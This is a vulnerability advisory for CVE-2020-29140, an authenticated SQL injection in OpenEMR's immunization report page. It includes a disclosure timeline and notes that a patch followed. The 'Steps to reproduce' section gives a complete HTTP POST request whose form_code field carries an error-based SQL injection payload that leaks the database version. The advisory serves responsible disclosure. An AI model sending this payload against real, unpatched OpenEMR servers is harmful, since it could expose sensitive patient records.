CVE-2020-29140. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)

Product: OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)

Vulnerability: SQL injection

Discovered: Kutlymurat Mambetniyazov (@manfromkz)

Acknowledgements: NitroTeam.kz

Date: 11/24/2020

Description: Ineffective use of add_escape_custom() in interface/reports/immunization_report.php leads to SQL injection.

Requirements: the administrator account

Tested on: Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev

Vulnerable code: interface/reports/immunization_report.php:129

$query_codes .= add_escape_custom($codes) . ") and ";

Steps to reproduce:

Send the POST request (replace with your Host, valid csrf_token_form and OpenEMR cookie of administrator):

POST /interface/reports/immunization_report.php HTTP/1.1
Host: openemr60.kz
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: https://openemr60.kz
Connection: close
Referer: https://openemr60.kz/interface/reports/immunization_report.php
Cookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD; 

csrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&form_refresh=true&form_get_hl7=false&form_code%5B%5D=25&form_code%5B%5D=extractvalue(0x0a,concat(0x0a,(version())))&form_from_date=2020-11-10&form_to_date=2020-11-17

Screenshot for 6.0.0-dev:

Screenshot for 5.0.2(5):

Timeline of the vulnerability:

11/24/2020 – vulnerability discover
11/24/2020 – notification to vendor
11/25/2020 – confirmation by vendor
11/27/2020 – reservation of CVE ID at MITRE
01/07/2021 – patch release
02/15/2021 – published

Leave a comment

Your email address will not be published. Required fields are marked *